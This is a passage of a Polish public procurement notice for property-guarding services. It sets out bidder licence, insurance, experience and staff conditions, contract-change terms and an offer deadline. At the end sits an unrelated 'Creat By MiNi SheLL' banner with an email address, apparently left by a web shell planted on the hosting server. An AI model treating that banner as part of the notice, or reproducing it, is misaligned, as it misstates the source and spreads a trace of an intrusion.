postępowaniu dotyczące:<br/>a. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać.<br/>b. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca wykaże, że posiada aktualną koncesję na<br/>prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia, wydaną na podstawie ustawy z dnia 22<br/>sierpnia 1997 o ochronie osób i mienia (tekst jedn. Dz.U. z 2021r. poz. 1995 z późn. zm).<br/>c. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>- jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia, na sumę gwarancyjną określoną min. na kwotę 200 000,00 zł.<br/>d. zdolności technicznej lub zawodowej:<br/>Warunek ten w zakresie doświadczenia - zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3<br/>lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) zrealizował<br/>należycie co najmniej dwie odrębne usługi polegające na dozorowaniu mienia o wartości usługi minimum 100.000,00 zł<br/>brutto każda. Zamawiający nie dopuszcza możliwości sumowania usług o mniejszej wartości w celu uzyskania wskazanej<br/>wartości usług.<br/>Warunek w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli<br/>Wykonawca wykaże, że dysponuje minimum 3 pracownikami ochrony, nie skazanymi prawomocnymi wyrokami za<br/>przestępstwa umyślne i przeciwko którym nie toczy się postępowanie karne, posiadającymi minimum 1-roczne<br/>doświadczenie w wykonywaniu zadań pracownika ochrony osób lub mienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp,sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wymaga złożenia:<br/>-aktualnie obowiązującej koncesji wydanej zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia w formie<br/>bezpośredniej ochrony fizycznej.<br/>- Polisy ubezpieczeniowej potwierdzającej posiadanie przez wykonawcę ubezpieczenia od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej 200.000,00 zł wraz z<br/>potwierdzeniem zapłaty składki ubezpieczeniowej<br/>- Wykazu usług (załącznik nr 7 do SWZ) wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca<br/>wykonania i podmiotów, na rzecz których usługi te zostały wykonane z załączeniem dowodów określających czy te usługi zostały<br/>wykonane należycie, przy czym dowodami tymi są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego<br/>usługi zostały wykonane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty.<br/>-Wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego (załącznik nr 8 do SWZ), w szczególności<br/>odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych czynności oraz informacją o podstawie dysponowania tymi<br/>osobami.<br/>- oświadczenia na temat posiadanych uprawnień pracowników skierowanych do realizacji zamówienia. (Niezobowiązujący wzór<br/>oświadczenia do wykorzystania zawiera załącznik nr 8 do SWZ).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art.58 ustawy pzp. Wymagania dotyczące<br/>oferenta stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje, na podstawie art. 455 ust. 1 PZP, możliwość dokonania zmian umowy pod następującymi<br/>warunkami:<br/>1.1 Zmiana wysokości wynagrodzenia Wykonawcy. (art. 436 pkt. 4 PZP):<br/>Zmiana wysokości wynagrodzenia należnego Wykonawcy, o którym mowa w § 10 ust. 1 umowy, jest możliwa tylko w<br/>przypadku zmiany:<br/>I) stawki podatku od towarów i usług,<br/>II) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej,<br/>III. zasad podlegania ubezpieczenia społecznego. lub ubezp. zdrow. lub wysokości stawki składki na ubezp. społ. lub<br/>zdrow.,<br/>IV. zasad gromadzenia i wysokości wpłat do Pracowniczych Planów Kapitałowych,<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę<br/>1.2 Pozostałe zmiany:<br/>a. Zmiany spełniające warunki art. 455 ust. 1 i 2 PZP;<br/>b. Wprowadzenie Podwykonawcy (w sytuacji, gdy Wykonawca w ofercie zadeklarował realizację siłami własnymi) za<br/>wyraźną zgodą Zamawiającego oraz na warunkach określonych w SWZ oraz wzorze umowy, rezygnacja z<br/>podwykonawstwa, zmiana zakresu podwykonawstwa,<br/>c. zmiana Wykonawcy w przypadkach sukcesji generalnej następującej w wyniku dozwolonego przekształcenia podmiotu<br/>bądź dziedziczenia oraz w przypadkach szczególnej sukcesji z mocy prawa (np. łączenie, dzielenie, przekształcenie spółek)<br/>d. zmiany wynikające ze zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację<br/>przedmiotu zamówienia lub świadczenia stron bądź zmiany przepisów wewnętrznych, obowiązujących w PGL LP<br/>(zarządzenia, decyzje i wytyczne Dyrektora Generalnego Lasów Państwowych).<br/>2. Dopuszcza się dokonywanie nieistotnych zmian umowy w rozumieniu przepisów PZP.<br/>3. Zmiany, o których mowa w ust. 1.1, 1.2, wymagają dla swej ważności formy obustronnego pisemnego aneksu.<br/>4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią<br/>jednocześnie zobowiązania do wyrażenia takiej zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-01-03 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https:/josephine.proebiz.com/pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-01-03 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-02-01</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie przewiduje możliwości zawarcia umowy ramowej.<br/>2. Zamawiający nie przewiduje możliwości udzielenie zamówienia polegającego na powtórzeniu podobnych usług<br/>3. Zamawiający nie dopuszcza składania ofert wariantowych.<br/>4. Zamawiający nie przewiduje aukcji elektronicznej.<br/>5. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>6. Zamawiający żąda wskazania w ofercie przez Wykonawcę tej części zamówienia, odpowiednio do treści postanowień<br/>SWZ, której wykonanie zamierza powierzyć podwykonawcom, a także wskazania nazw (firm) podwykonawców na zasoby,<br/>których się powołuje w celu spełnienia warunków udziału w postępowaniu.<br/>7. Zamawiający nie zastrzega możliwości ubiegania się udzielenie zamówienia wyłącznie wykonawców o których mowa w<br/>art. 94 ustawy Pzp.<br/>8. Zamawiający nie zastrzega kluczowych zadań do osobistego wykonania przez wykonawcę.<br/>9. Zamawiający nie dopuszcza możliwości składania ofert w formie katalogów elektronicznych lub dołączenia katalogów<br/>elektronicznych<br/>10. Zamawiający nie przewiduje rozliczania w walutach obcych.<br/>12. Zgodnie art. 95 ust. 1 i 2 ustawy Pzp, Zamawiający wymaga, aby Wykonawca, podwykonawca lub dalszy<br/>podwykonawca przy realizacji wszystkich czynności składających się na przedmiot zamówienia, a związanych z<br/>wykonywaniem prac fizycznych, obsługą maszyn i prowadzeniem pojazdów, zatrudniał na podstawie umowy o pracę w<br/>rozumieniu przepisów Kodeksu Pracy, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w<br/>art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks Pracy (dalej „Obowiązek Zatrudnienia”). Obowiązek zatrudnienia na<br/>podstawie umowy o pracę nie dotyczy sytuacji w której Wykonawca lub Podwykonawca osobiście wykonuje powyższe<br/>czynności (np. osoba fizyczna prowadząca działalność gospodarczą, wspólnicy spółki cywilnej<br/>-Zamawiający uwzględnia w postępowaniu podstawy wykluczenia z art. 7 ust.1 ustawy z dnia 13 kwietnia 2022r o<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego ( Dz. U 2024 poz.507)

Creat By MiNi SheLL
Email: jattceo@gmail.com